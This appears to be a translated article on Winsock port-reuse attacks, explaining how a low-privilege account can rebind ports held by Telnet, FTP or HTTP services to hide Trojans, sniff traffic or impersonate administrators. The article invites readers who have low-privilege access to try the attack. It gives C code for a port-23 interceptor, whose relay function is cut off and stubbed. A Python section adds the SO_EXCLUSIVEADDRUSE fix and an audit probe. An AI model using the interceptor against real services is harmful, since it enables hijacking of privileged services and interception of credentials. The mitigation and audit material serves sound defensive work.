Port reuse: port hiding, sniffing and attack through Winsock rebinding
In Windows Socket server programming you will often see code like this:

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = htonl(INADDR_ANY);
    bind(s, (sockaddr *)&saddr, sizeof(saddr));

This hides a serious security hazard. In the Winsock implementation a server port may be bound more than once, and which of the multiple bindings receives the traffic is decided by one rule only: the most specific binding wins. No permission check is involved, so a user with no privileges at all can rebind a port already held by a high-privilege service such as one started at system startup. What does this mean? It means the following attacks are possible:

1. A Trojan binds to a port that a legitimate service already holds. It recognises its own packets by their specific format and handles them itself; everything else it forwards over 127.0.0.1 to the real server application for processing.

2. A Trojan binds the port of a high-privilege service application and sniffs the data that service handles. Monitoring the communication of a socket on a host normally requires very high privileges, but by simply rebinding the socket you can monitor that communication through this socket-programming vulnerability, without any hooks or low-level driver techniques (which require administrator privileges).

3. For some special applications you can mount a man-in-the-middle attack, obtaining information or performing spoofing from a low-privilege account. For example, intercept port 23 of the Telnet server under the Guest account: with NTLM authentication you cannot obtain the password directly, but once an admin user logs in, your program can act as a middleman, impersonating that logged-in user to send high-privilege commands through the socket and so achieve the intrusion.
In fact MS's own services have this problem in their socket code: the TELNET, FTP and HTTP service implementations can all be attacked this way, so a SYSTEM application is taken over from a low-privilege user account. IIS, including on W2K SP3, is the same. So if you can get in with a low-privilege user and the other side has these services open, you may wish to try. I estimate that many third-party services have the same vulnerability as well. The fix is very simple: when writing code like the above, call setsockopt with SO_EXCLUSIVEADDRUSE to request exclusive use of the port address and disallow reuse; then nobody else can multiplex the port. Below is an example of a simple interception of the MS Telnet server, which succeeds under the Guest user; the rest is tailoring for your own needs, such as hiding, sniffing data, spoofing high-privilege users and so on. The listing on the page ends part-way through ClientThread, so the per-client relay body is not reproduced here.

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
    WORD wVersionRequested;
    DWORD ret;
    WSADATA wsaData;
    BOOL val;
    SOCKADDR_IN saddr;
    SOCKADDR_IN scaddr;
    int err;
    SOCKET s;
    SOCKET sc;
    int caddsize;
    HANDLE mt;
    DWORD tid;

    wVersionRequested = MAKEWORD(2, 2);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("Error! WSAStartup failed!\n");
        return -1;
    }

    saddr.sin_family = AF_INET;
    // The interceptor could also bind INADDR_ANY, but so as not to disturb the
    // normal application it binds a specific IP and leaves 127.0.0.1 to the
    // legitimate service; that address is then used for forwarding.
    saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
    saddr.sin_port = htons(23);

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        printf("Error! socket failed!\n");
        return -1;
    }

    val = TRUE;
    // The SO_REUSEADDR option is what makes the second bind on port 23 succeed.
    if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val)) != 0) {
        printf("Error! setsockopt failed!\n");
        return -1;
    }

    // If the service had specified SO_EXCLUSIVEADDRUSE, this bind would not
    // succeed and would return an access-denied error code.
    // To hide behind port reuse one can test dynamically which currently bound
    // ports accept a second bind; success indicates this vulnerability, and the
    // port can then be used to stay hidden.
    // UDP ports can be bound and used the same way; the Telnet service is used
    // here as the example.
    if (bind(s, (SOCKADDR *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
        ret = WSAGetLastError();
        printf("Error! bind failed! (error %lu)\n", ret);
        return -1;
    }
    listen(s, 2);

    while (1) {
        caddsize = sizeof(scaddr);
        // Accept a connection request
        sc = accept(s, (struct sockaddr *)&scaddr, &caddsize);
        if (sc != INVALID_SOCKET) {
            mt = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, &tid);
            if (mt == NULL) {
                printf("Thread creation failed!\n");
                break;
            }
            CloseHandle(mt);
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
    SOCKET ss = (SOCKET)lpParam;
    SOCKET sc;
    unsigned char buf[4096];
    // The page's listing stops here; the remainder of the relay body is not
    // present. The connection is closed so the function is complete.
    (void)sc;
    (void)buf;
    closesocket(ss);
    return 0;
}
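The defender's side of the fix, as an added example that is not code from the original article: a server bind helper that requests exclusive use of the address, beside an audit probe that performs the same second SO_REUSEADDR bind the interceptor above relies on and reports whether the service's port can be rebound. The names bind_listener and port_is_rebindable are mine; SO_EXCLUSIVEADDRUSE only exists in Winsock, so on POSIX the helper simply leaves SO_REUSEADDR unset and the probe is refused for a different reason (a listening socket already holds the port).

```python
import socket
import sys

# SO_EXCLUSIVEADDRUSE is a Winsock-only option; on POSIX the attribute is absent.
SO_EXCLUSIVE = getattr(socket, "SO_EXCLUSIVEADDRUSE", None)


def bind_listener(port, host="127.0.0.1", exclusive=True):
    """Open a listening TCP socket on host:port.

    exclusive=True  is the hardened pattern from the article: ask for exclusive
                    use of the address with SO_EXCLUSIVEADDRUSE (Windows only;
                    on POSIX just leave SO_REUSEADDR unset).
    exclusive=False is the weak pattern: SO_REUSEADDR, which on Windows lets a
                    second, less privileged process bind the same port.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if exclusive:
        if SO_EXCLUSIVE is not None:
            s.setsockopt(socket.SOL_SOCKET, SO_EXCLUSIVE, 1)
    else:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s


def port_is_rebindable(port, host="127.0.0.1"):
    """Audit probe: attempt a second SO_REUSEADDR bind to host:port, the same
    step the article's interceptor performs. True means the bind was accepted
    (the service is hijackable); False means it was refused (WSAEACCES on a
    Windows service that set SO_EXCLUSIVEADDRUSE, EADDRINUSE on POSIX)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        probe.bind((host, port))
        return True
    except OSError:
        return False
    finally:
        probe.close()


if __name__ == "__main__":
    # Usage: python check_rebind.py <port> [host]  -- run from an unprivileged
    # account against a service that is already listening on that port.
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 23
    host = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1"
    hijackable = port_is_rebindable(port, host)
    print(f"{host}:{port} -> " + ("REBINDABLE: set SO_EXCLUSIVEADDRUSE" if hijackable else "exclusive"))
```

Run the probe on Windows against each listening service in turn; any port it reports as rebindable is one the interceptor above could take over from a Guest account.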